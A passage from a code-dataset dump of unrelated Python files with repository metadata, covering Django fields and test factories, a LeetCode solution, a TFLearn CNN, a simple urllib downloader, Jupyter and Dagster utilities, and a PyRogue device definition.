generate_base_output_dir(args.model_type, parse_extra_model_args(extras)))
2.125
2
django/privat_gos_sait/about_company/templatetags/test_teg.py
Netromnik/python
0
12796618
<reponame>Netromnik/python from django import template register = template.Library() @register.filter('modF') def modF(value, arg): print (not (int( value)%int(arg))) return not (int( value)%int(arg))
2.46875
2
small_number.py
ambivert143/PythonProgram
0
12796619
<filename>small_number.py class Small_Number: def __init__(self, list): self.list = list def sma(self): for x in range(len(self.list)): for y in range(len(self.list)): if self.list[x] > self.list[y]: self.list[x], self.list[y] = self.list[y], self.list[x] print(self.list[-2]) s1 = Small_Number([1,2,-8,-2,0,-2]) s1.sma()
3.609375
4
coding_interviews/leetcode/medium/reduce_array_size_to_the_half/reduce_array_size_to_the_half.py
LeandroTk/Algorithms
205
12796620
<reponame>LeandroTk/Algorithms<filename>coding_interviews/leetcode/medium/reduce_array_size_to_the_half/reduce_array_size_to_the_half.py # https://leetcode.com/problems/reduce-array-size-to-the-half ''' Time Complexity: O(NlogN) Space Complexity: O(N) ''' def min_set_size(arr): num_to_count, counts, min_size, current_length = {}, [], 0, len(arr) for num in arr: if num in num_to_count: num_to_count[num] += 1 else: num_to_count[num] = 1 for num in num_to_count: counts.append(num_to_count[num]) counts = reversed(sorted(counts)) if len(arr) % 2 == 0: cut = len(arr) / 2 else: cut = len(arr + 1) / 2 for count in counts: min_size += 1 current_length -= count if current_length <= cut: return min_size return min_size
3.890625
4
configs/nas_fcos/ranksort_nas_fcos_r50_caffe_fpn_1x_coco_lr0010.py
yinchimaoliang/ranksortloss
210
12796621
_base_ = 'ranksort_nas_fcos_r50_caffe_fpn_1x_coco.py' optimizer = dict(lr=0.010)
0.941406
1
app/tests/courses/factories.py
Valaraucoo/raven
3
12796622
import datetime import random import factory import factory.fuzzy as fuzzy from django.core.files.base import ContentFile from courses import models from courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES from tests.users import factories as users_factories from users import models as users_models PROFILE_CHOICES = [x[0] for x in PROFILE_CHOICES] LANGUAGE_CHOICES = [x[0] for x in LANGUAGE_CHOICES] class GradeFactory(factory.django.DjangoModelFactory): class Meta: model = models.Grade name = factory.Sequence(lambda n: "Grade %03d" % n) start_year = factory.Faker('date_object') supervisor = factory.SubFactory(users_factories.StudentFactory) profile = fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation def students(self, create, extracted, **kwargs): if not create: return if extracted: for student in extracted: self.students.add(student) else: random_students = random.choices(users_models.Student.objects.all(), k=10) for student in random_students: self.students.add(student) class CourseFactory(factory.django.DjangoModelFactory): class Meta: model = models.Course name = factory.Sequence(lambda n: "Course %02d" % n) description = factory.Faker('text') head_teacher = factory.SubFactory(users_factories.TeacherFactory) grade = factory.SubFactory(GradeFactory) code_meu = '123' has_exam = False semester = fuzzy.FuzzyChoice([i for i in range(1, 8)]) language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)]) labs_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)]) @factory.post_generation def teachers(self, create, extracted, **kwargs): if not create: return if extracted: for teacher in extracted: self.teachers.add(teacher) else: random_teachers = random.choices(users_models.Teacher.objects.all(), k=5) for teacher in random_teachers: self.teachers.add(teacher) class LectureFactory(factory.django.DjangoModelFactory): class Meta: model = models.Lecture course = factory.SubFactory(CourseFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class GroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup name = fuzzy.FuzzyText(length=16) @factory.post_generation def students(self, create, extracted, **kwargs): if not create: return if extracted: for student in extracted: self.students.add(student) class LabFactory(factory.django.DjangoModelFactory): class Meta: model = models.Laboratory course = factory.SubFactory(CourseFactory) group = factory.SubFactory(GroupFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class CourseGroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup course = factory.SubFactory(CourseFactory) name = fuzzy.FuzzyText(length=16) class CourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseMark mark = 65 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class FinalCourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.FinalCourseMark mark = 5 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class NoticeFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseNotice course = factory.SubFactory(CourseFactory) sender = factory.SubFactory(users_factories.TeacherFactory) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') created_at = fuzzy.FuzzyDate(datetime.date.today()) class AssignmentFactory(factory.django.DjangoModelFactory): class Meta: model = models.Assignment laboratory = factory.SubFactory(LabFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) deadline = fuzzy.FuzzyDate(datetime.date.today()) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') class CourseFileFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseFile name = fuzzy.FuzzyText(length=16) description = factory.Faker('text') file = factory.LazyAttribute( lambda _: ContentFile( factory.django.ImageField()._make_data( {'width': 600, 'height': 600} ), 'example.jpg' ) ) created_at = fuzzy.FuzzyDate(datetime.date.today()) updated_at = fuzzy.FuzzyDate(datetime.date.today())
2.390625
2
geotrek/common/tests/__init__.py
ker2x/Geotrek-admin
0
12796623
<filename>geotrek/common/tests/__init__.py<gh_stars>0 # -*- encoding: utf-8 -*- from django.utils import translation from django.utils.translation import ugettext as _ # Workaround https://code.djangoproject.com/ticket/22865 from geotrek.common.models import FileType # NOQA from mapentity.tests import MapEntityTest from geotrek.authent.factories import StructureFactory from geotrek.authent.tests import AuthentFixturesTest class TranslationResetMixin(object): def setUp(self): translation.deactivate() super(TranslationResetMixin, self).setUp() class CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest): api_prefix = '/api/en/' def get_bad_data(self): return {'topology': 'doh!'}, _(u'Topology is not valid.') def test_structure_is_set(self): if not hasattr(self.model, 'structure'): return self.login() response = self.client.post(self._get_add_url(), self.get_good_data()) self.assertEqual(response.status_code, 302) obj = self.model.objects.last() self.assertEqual(obj.structure, self.user.profile.structure) def test_structure_is_not_changed(self): if not hasattr(self.model, 'structure'): return self.login() structure = StructureFactory() self.assertNotEqual(structure, self.user.profile.structure) obj = self.modelfactory.create(structure=structure) self.client.post(obj.get_update_url(), self.get_good_data()) self.assertEqual(obj.structure, structure)
2
2
yepes/fields/char.py
samuelmaudo/yepes
0
12796624
<reponame>samuelmaudo/yepes # -*- coding:utf-8 -*- from __future__ import unicode_literals from django.core import checks from django.core.validators import MinLengthValidator from django.db import models from django.utils import six from django.utils.encoding import force_text from django.utils.translation import ugettext_lazy as _ from yepes import forms from yepes.fields.calculated import CalculatedField from yepes.utils import unidecode from yepes.utils.deconstruct import clean_keywords from yepes.validators import CharSetValidator def check_max_length_attribute(self, **kwargs): if (self.max_length is not None and (not isinstance(self.max_length, six.integer_types) or self.max_length <= 0)): return [ checks.Error( "'max_length' must be None or a positive integer.", hint=None, obj=self, id='yepes.E111', ) ] else: return [] def check_min_length_attribute(self, **kwargs): if self.min_length is None: return [] elif (not isinstance(self.min_length, six.integer_types) or self.min_length <= 0): return [ checks.Error( "'min_length' must be None or a positive integer.", hint=None, obj=self, id='yepes.E112', ) ] elif (isinstance(self.max_length, six.integer_types) and self.max_length < self.min_length): return [ checks.Error( "'min_length' cannot be greater than 'max_length'.", hint="Decrease 'min_length' or increase 'max_length'.", obj=self, id='yepes.E113', ) ] else: return [] class CharField(CalculatedField, models.CharField): description = _('String') def __init__(self, *args, **kwargs): self.charset = kwargs.pop('charset', None) self.force_ascii = kwargs.pop('force_ascii', False) self.force_lower = kwargs.pop('force_lower', False) self.force_upper = kwargs.pop('force_upper', False) self.min_length = kwargs.pop('min_length', None) self.normalize_spaces = kwargs.pop('normalize_spaces', True) self.trim_spaces = kwargs.pop('trim_spaces', False) super(CharField, self).__init__(*args, **kwargs) if self.min_length is not None: self.validators.append(MinLengthValidator(self.min_length)) if self.charset is not None: self.validators.append(CharSetValidator(self.charset)) def check(self, **kwargs): errors = super(CharField, self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs)) return errors _check_min_length_attribute = check_min_length_attribute def deconstruct(self): name, path, args, kwargs = super(CharField, self).deconstruct() path = path.replace('yepes.fields.char', 'yepes.fields') clean_keywords(self, kwargs, variables={ 'charset': None, 'force_ascii': False, 'force_lower': False, 'force_upper': False, 'min_length': None, 'normalize_spaces': True, 'trim_spaces': False, }) return (name, path, args, kwargs) def formfield(self, **kwargs): params = { 'form_class': forms.CharField, 'charset': self.charset, 'force_ascii': self.force_ascii, 'force_lower': self.force_lower, 'force_upper': self.force_upper, 'max_length': self.max_length, 'min_length': self.min_length, 'normalize_spaces': self.normalize_spaces, 'trim_spaces': self.trim_spaces, } params.update(kwargs) return super(CharField, self).formfield(**params) def to_python(self, value): if value is None: return value if not isinstance(value, six.string_types): value = force_text(value) if self.normalize_spaces: value = ' '.join(value.split()) elif self.trim_spaces: value = value.strip() if not value: return value if self.force_ascii: value = unidecode(value) if self.force_lower: value = value.lower() elif self.force_upper: value = value.upper() return value
2.15625
2
tests/test_utility.py
jrepp/redis-bus
0
12796625
from redisbus.utility import DictObj def test_dictobj(): subject_dict = { "foo": "bar", "left": "right" } subject_obj = DictObj(subject_dict) assert hasattr(subject_obj, 'foo') assert hasattr(subject_obj, 'left') assert subject_obj.foo == "bar" assert subject_obj.left == "right"
2.75
3
examples/ModelMocks.py
pedro19v/GIMME
0
12796626
<reponame>pedro19v/GIMME<filename>examples/ModelMocks.py<gh_stars>0 from GIMMECore import TaskModelBridge from GIMMECore import PlayerModelBridge class PlayerModelMock(object): def __init__(self, id, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences): self.currState = currState self.id = id self.name = name self.pastModelIncreasesGrid = pastModelIncreasesGrid # self.preferencesEst = preferencesEst.normalized() # self.realPreferences = realPreferences.normalized() self.baseLearningRate = None class TaskModelMock(object): def __init__(self, id, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight): self.id = id self.description = description self.minRequiredAbility = minRequiredAbility self.profile = profile self.difficultyWeight = difficultyWeight self.profileWeight = profileWeight self.minDuration = minDuration class CustomTaskModelBridge(TaskModelBridge): def __init__(self, tasks): self.tasks = tasks self.numTasks = len(tasks) def registerNewTask(self, taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight): self.tasks[taskId] = TaskModelMock(taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight) def getAllTaskIds(self): return [int(i) for i in range(self.numTasks)] def getTaskInteractionsProfile(self, taskId): return self.tasks[taskId].profile def getMinTaskRequiredAbility(self, taskId): return self.tasks[taskId].minRequiredAbility def getMinTaskDuration(self, taskId): return self.tasks[taskId].minDuration def getTaskDifficultyWeight(self, taskId): return self.tasks[taskId].difficultyWeight def getTaskProfileWeight(self, taskId): return self.tasks[taskId].profileWeight def getTaskInitDate(self, taskId): return self.tasks[taskId].initDate def getTaskFinalDate(self, taskId): return self.tasks[taskId].finalDate class CustomPlayerModelBridge(PlayerModelBridge): def __init__(self, players): self.players = players self.numPlayers = len(players) def registerNewPlayer(self, playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences): self.players[int(playerId)] = PlayerModelMock(playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences) def resetPlayer(self, playerId): self.players[int(playerId)].currState.reset() self.players[int(playerId)].pastModelIncreasesGrid.reset() def resetState(self, playerId): self.players[int(playerId)].currState.reset() def setAndSavePlayerStateToGrid(self, playerId, increases, newState): self.players[int(playerId)].currState = newState self.players[int(playerId)].pastModelIncreasesGrid.pushToDataFrame(increases) def setBaseLearningRate(self, playerId, blr): self.players[int(playerId)].baseLearningRate = blr def getBaseLearningRate(self, playerId): return self.players[int(playerId)].baseLearningRate def getAllPlayerIds(self): return [int(i) for i in range(self.numPlayers)] def getPlayerName(self, playerId): return self.players[int(playerId)].name def getPlayerCurrState(self, playerId): return self.players[int(playerId)].currState def getPlayerCurrProfile(self, playerId): return self.players[int(playerId)].currState.profile def getPlayerStatesDataFrame(self, playerId): return self.players[int(playerId)].pastModelIncreasesGrid def getPlayerCurrCharacteristics(self, playerId): return self.players[int(playerId)].currState.characteristics def getPlayerPreferencesEst(self, playerId): return self.players[int(playerId)].preferencesEst def setPlayerPreferencesEst(self, playerId, preferencesEst): self.players[int(playerId)].preferencesEst = preferencesEst def setPlayerCharacteristics(self, playerId, characteristics): self.players[int(playerId)].currState.characteristics = characteristics def setPlayerProfile(self, playerId, profile): self.players[int(playerId)].currState.profile = profile def setPlayerGroup(self, playerId, group): self.players[int(playerId)].currState.group = group def setPlayerTasks(self, playerId, tasks): self.players[int(playerId)].currState.tasks = tasks def setPlayerRealPreferences(self, playerId, realPreferences): self.players[int(playerId)].realPreferences = realPreferences def getPlayerRealPreferences(self, playerId): return self.players[int(playerId)].realPreferences
2.53125
3
src/conv_net.py
chatdip98/Acoustic-Scene-Classification
0
12796627
<reponame>chatdip98/Acoustic-Scene-Classification #----convolutional neural network for classification------ #importing required libraries and modules import os import numpy as np import tensorflow as tf import tflearn from tflearn.layers.conv import conv_2d, max_pool_2d from tflearn.layers.core import input_data, dropout, fully_connected from tflearn.layers.estimator import regression class CNN(): datasize = 'full' def __init__(self): #constructor pass def create_1ConvModel(self): #creating the CNN model as per the architecture followed with 4-conv and pooling layers self.convnet = input_data(shape=[None, 128, 431, 1], name='input') self.convnet = conv_2d(self.convnet, 32, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 64, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 128, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = conv_2d(self.convnet, 256, 5, activation='relu') self.convnet = max_pool_2d(self.convnet, 3) self.convnet = tflearn.layers.conv.global_avg_pool(self.convnet) self.convnet = fully_connected(self.convnet, 1024, activation='relu') #self.convnet = dropout(self.convnet, 0.8) can be used to avoid overfitting self.convnet = fully_connected(self.convnet, 15, activation='softmax') self.convnet = regression(self.convnet, optimizer='adam', learning_rate=0.01, loss='categorical_crossentropy', name='targets') self.model = tflearn.DNN(self.convnet) return self.model def train_1ConvModel(self, arg, model, X_train, Y_train, X_val, Y_val): #training the created model with data from the user #here stochastic learning is deployed since the input data is not too high; minibatch_size=1 self.epoch = 10 #set the number of epochs model.fit({'input' : X_train}, {'targets' : Y_train}, n_epoch=self.epoch, validation_set=({'input' : X_val}, {'targets' : Y_val}), show_metric=True, run_id='DCNet') model.save('DNN/'+CNN.data_size+'/'+arg+'.model') #saving the model in the DNN/full folder, 3 files will be created for each model return model def predict_test_data(self, arg, model, X_test, Y_test): self.ans = [] count = 0 for i in range(len(X_test)): self.pr = model.predict([X_test[i]])[0] self.ans.append(self.pr) if(np.array_equal((np.round(self.pr)).astype(int), Y_test[i])): count+=1 print(arg, "Test Accuracy = ", (count/len(X_test))*100, "%") #calculating test accuracy for each classifier #saving the softmax outputs for using them later for calculating the ensemble accuracy np.save('test_prediction/full/'+arg+'.npy', np.array(self.ans))
3.109375
3
previous code/lea_1.py
hyywestwood/Spider-of-Water-data
2
12796628
# -*- coding: utf-8 -*- # @Time : 2019/4/22 14:57 # @Author : hyy # @Email : <EMAIL> # @File : lea_1.py # @Software: PyCharm import urllib.request def download(url, num_retries = 2): print('Downloading:',url) headers = {'User-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'} request = urllib.request.Request(url, headers=headers) try: html = urllib.request.urlopen(request).read() except urllib.request.URLError as e: print('Download error:', e.reason) html = None if num_retries > 0: if hasattr(e, 'code') and 500 <= e.code < 600: return download(url, num_retries-1) return html if __name__ == '__main__': html = download('http://httpstat.us/500')
3.265625
3
kale/tests/unit_tests/test_jupyter_utils.py
klolos/kale
0
12796629
# Copyright 2020 The Kale Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import json import pytest from testfixtures import mock from kale.utils import jupyter_utils as ju def _output_display(data): # `data` must be a list return [{'output_type': 'display_data', 'data': data}] @pytest.mark.parametrize("outputs,target", [ ([], ""), # --- (_output_display({'image/png': "bytes"}), ju.image_html_template.format("", "bytes")), # --- (_output_display({'text/html': "bytes"}), "bytes"), # --- (_output_display({'text/plain': "bytes"}), ju.text_html_template.format("bytes")), # --- (_output_display({'application/javascript': "bytes"}), ju.javascript_html_template.format("bytes")), ]) def test_generate_html_output(outputs, target): """Tests html artifact generation from cell outputs.""" assert target == ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_not_exists(pod_utils, tmpdir): """Test the uimetadata file is created when it does not exists.""" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file has been updated correctly updated = json.loads(open(filepath).read()) target = {"outputs": [{ 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_empty(pod_utils, tmpdir): """Test that the uimetadata file is updated inplace correctly.""" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file base = {"outputs": []} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file has been updated correctly updated = json.loads(open(filepath).read()) target = {"outputs": [{ 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_not_empty(pod_utils, tmpdir): """Test that the uimetadata file is updated inplace correctly.""" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file markdown = { 'type': 'markdown', 'storage': 'inline', 'source': '#Some markdown' } base = {"outputs": [markdown]} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file has been updated correctly updated = json.loads(open(filepath).read()) target = {"outputs": [markdown, { 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x) def test_run_code(): """Test that Python code runs inside a jupyter kernel successfully.""" # test standard code code = ("a = 3\nprint(a)", ) ju.run_code(code) # test magic command code = ("%%time\nprint('Some dull code')", ) ju.run_code(code)
1.78125
2
python_modules/dagster/dagster/core/snap/repository_snapshot.py
flowersw/dagster
3
12796630
<filename>python_modules/dagster/dagster/core/snap/repository_snapshot.py from collections import OrderedDict, namedtuple from dagster import RepositoryDefinition, check from dagster.core.snap.pipeline_snapshot import PipelineIndex, PipelineSnapshot from dagster.serdes import whitelist_for_serdes class RepositoryIndex: def __init__(self, repository_snapshot): self.repository_snapshot = check.inst_param( repository_snapshot, 'repository_snapshot', RepositorySnapshot ) self._pipeline_index_map = OrderedDict( (pipeline_snapshot.name, PipelineIndex(pipeline_snapshot)) for pipeline_snapshot in repository_snapshot.pipeline_snapshots ) def get_pipeline_index(self, pipeline_name): return self._pipeline_index_map[pipeline_name] def has_pipeline_index(self, pipeline_name): return pipeline_name in self._pipeline_index_map def get_pipeline_indices(self): return self._pipeline_index_map.values() @staticmethod def from_repository_def(repository_definition): return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')): def __new__(cls, name, pipeline_snapshots): return super(RepositorySnapshot, cls).__new__( cls, name=check.str_param(name, 'name'), pipeline_snapshots=check.list_param( pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot ), ) def has_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return True return False def get_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return pipeline check.failed('pipeline not found') def get_all_pipeline_snapshots(self): return self.pipeline_snapshots @staticmethod def from_repository_definition(repository_definition): check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition) return RepositorySnapshot( name=repository_definition.name, pipeline_snapshots=[ PipelineSnapshot.from_pipeline_def(pipeline_definition) for pipeline_definition in repository_definition.get_all_pipelines() ], )
2.234375
2
spider_frame/framework/build/lib/scrapy_plus/middlwares/spider_middlewares.py
originx-23/spider_frame
1
12796631
# 下载器中间件模块: 用于对请求和响应数据进行预处理 class SpiderMiddleware(object): def process_request(self, request): # 用于处理请求的: 在请求对象交给引擎之前调用 print("SpiderMiddleware-process_request-{}".format(request.url)) return request def process_response(self, response): # 用于处理响应数据: 在响应对象交给爬虫之前调用 print("SpiderMiddleware-process_response-{}".format(response.url)) return response
3.15625
3
src/tests/hoplalib/hatchery/test_hatchpotionmodels.py
rickie/hopla
0
12796632
<reponame>rickie/hopla<filename>src/tests/hoplalib/hatchery/test_hatchpotionmodels.py<gh_stars>0 #!/usr/bin/env python3 import random from typing import List import click import pytest from hopla.hoplalib.errors import YouFoundABugRewardError from hopla.hoplalib.hatchery.hatchdata import HatchPotionData from hopla.hoplalib.hatchery.hatchpotionmodels import HatchPotion, HatchPotionCollection, \ HatchPotionException _SAMPLE_SIZE = 10 class TestHatchPotion: def test__init__invalid_name_fail(self): name = "InvalidName" with pytest.raises(HatchPotionException) as exec_info: HatchPotion(name, quantity=1) assert str(exec_info.value).startswith(f"{name} is not a valid hatching potion name.") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( "potion_name,quantity", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(-_SAMPLE_SIZE, 0))) ) def test__init__invalid_quantity_fail(self, potion_name: str, quantity: int): with pytest.raises(HatchPotionException) as exec_info: HatchPotion(potion_name, quantity=quantity) assert str(exec_info.value).startswith(f"{quantity} is below 0.") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( "potion_name,quantity", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(0, _SAMPLE_SIZE))) ) def test__repr__ok(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) result: str = repr(potion) assert result == f"HatchPotion({potion_name}: {quantity})" def test__eq__(self): assert HatchPotion("Red") == HatchPotion("Red") assert HatchPotion("Shimmer", quantity=1) == HatchPotion("Shimmer") assert HatchPotion("Silver") != HatchPotion("Silver", quantity=2) assert HatchPotion("Watery") != HatchPotion("Glow") @pytest.mark.parametrize("potion_name,quantity", [ ("Base", 10), ("CottonCandyBlue", 1), ("Golden", 0), ]) def test_is_standard_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is True assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize("potion_name,quantity", [ ("BirchBark", 10), ("Windup", 1), ("Vampire", 0), ("Ruby", 9), ("Amber", 69), ("MossyStone", 42), ("SolarSystem", 9001), ]) def test_is_magic_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is True assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize("potion_name,quantity", [ ("Veggie", 10), ("Dessert", 0), ]) def test_is_wacky_hatch_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is True class TestHatchPotionCollection: def test__init__empty_ok(self): collection = HatchPotionCollection() assert collection == HatchPotionCollection({}) assert len(collection) == 0 def test__init__ok(self): potion_dict = {"Base": 0, "Moonglow": 42, "Sunset": 2} collection = HatchPotionCollection(potion_dict) assert collection["Base"] == HatchPotion("Base", quantity=0) assert collection["Moonglow"] == HatchPotion("Moonglow", quantity=42) assert collection["Sunset"] == HatchPotion("Sunset", quantity=2) def test__eq__ok(self): left = HatchPotionCollection({"Frost": 1, "Glow": 1}) right = HatchPotionCollection({"Glow": 1, "Frost": 2}) assert left != right assert HatchPotionCollection() == HatchPotionCollection() assert HatchPotionCollection({"StarryNight": 1}) != HatchPotionCollection() assert HatchPotionCollection({"Windup": 2}) == HatchPotionCollection({"Windup": 2}) assert HatchPotionCollection({"Frost": 1}) != HatchPotionCollection({"Frost": 2}) def test__iter__ok(self): collection = HatchPotionCollection({"Base": 1, "Moonglow": 42, "Sunset": 2}) iterator = iter(collection) assert next(iterator) == "Base" assert next(iterator) == "Moonglow" assert next(iterator) == "Sunset" with pytest.raises(StopIteration): next(iterator) def test__getitem__ok(self): collection = HatchPotionCollection({"Base": 1, "Moonglow": 42, "Sunset": 0}) assert collection["Base"] == HatchPotion("Base", quantity=1) assert collection["Moonglow"] == HatchPotion("Moonglow", quantity=42) assert collection["Sunset"] == HatchPotion("Sunset", quantity=0) def test_values_ok(self): potion1, quantity1 = "Dessert", 10 potion2, quantity2 = "MossyStone", 1 potion3, quantity3 = "StainedGlass", 2 collection = HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3 }) generator = collection.values() assert next(generator) == HatchPotion(potion1, quantity=quantity1) assert next(generator) == HatchPotion(potion2, quantity=quantity2) assert next(generator) == HatchPotion(potion3, quantity=quantity3) with pytest.raises(StopIteration): _ = next(generator) def test_values_as_list_ok(self): potion1, quantity1 = "Golden", 1 potion2, quantity2 = "Sunshine", 41 potion3, quantity3 = "Vampire", 3 collection = HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3 }) result: List[HatchPotion] = list(collection.values()) expected: List[HatchPotion] = [ HatchPotion(potion1, quantity=quantity1), HatchPotion(potion2, quantity=quantity2), HatchPotion(potion3, quantity=quantity3) ] assert result == expected def test_remove_hatch_potion_ok(self): potion1_quantity = 3 potion2_quantity = 42 potion3_name, potion3_quantity = "Sunset", 1 collection = HatchPotionCollection({ "Base": potion1_quantity, "Moonglow": potion2_quantity, potion3_name: potion3_quantity }) collection.remove_hatch_potion(HatchPotion("Base")) collection.remove_hatch_potion(HatchPotion("Moonglow")) collection.remove_hatch_potion(HatchPotion(potion3_name)) assert collection["Base"] == HatchPotion("Base", quantity=potion1_quantity - 1) assert collection["Moonglow"] == HatchPotion("Moonglow", quantity=potion2_quantity - 1) assert collection[potion3_name] == HatchPotion(potion3_name, quantity=potion3_quantity - 1) def test_remove_hatch_potion_not_available_faile(self): collection = HatchPotionCollection({"Base": 1}) not_found_potion_name = "Moonglow" with pytest.raises(HatchPotionException) as exec_info: collection.remove_hatch_potion(HatchPotion(not_found_potion_name)) expected_msg = f"{not_found_potion_name} was not in the collection " assert str(exec_info.value).startswith(expected_msg)
2.59375
3
firmware/common/pyrogue/common/AppCore.py
ruck314/dev-board-cryo
1
12796633
<filename>firmware/common/pyrogue/common/AppCore.py #!/usr/bin/env python #----------------------------------------------------------------------------- # Title : PyRogue AMC Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- # File : AppCore.py # Created : 2017-04-03 #----------------------------------------------------------------------------- # Description: # PyRogue AMC Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- # This file is part of the rogue software platform. It is subject to # the license terms in the LICENSE.txt file found in the top-level directory # of this distribution and at: # https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. # No part of the rogue software platform, including this file, may be # copied, modified, propagated, or distributed except according to the terms # contained in the LICENSE.txt file. #----------------------------------------------------------------------------- import pyrogue as pr from common.SimRtmCryoDet import * class StreamData(pr.Device): def __init__( self, name = "StreamReg", description = "Stream control", **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices for i in range(4096): self.add(pr.RemoteVariable( name = f'StreamData[{i}]', description = "Dummy stream data", offset = 0x000000 + i*0x2, bitSize = 16, bitOffset = 0, base = pr.Int, mode = "RW", )) class StreamControl(pr.Device): def __init__( self, name = "StreamControl", description = "Stream control", **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices self.add(pr.RemoteVariable( name = "EnableStreams", description = "EnableStream", offset = 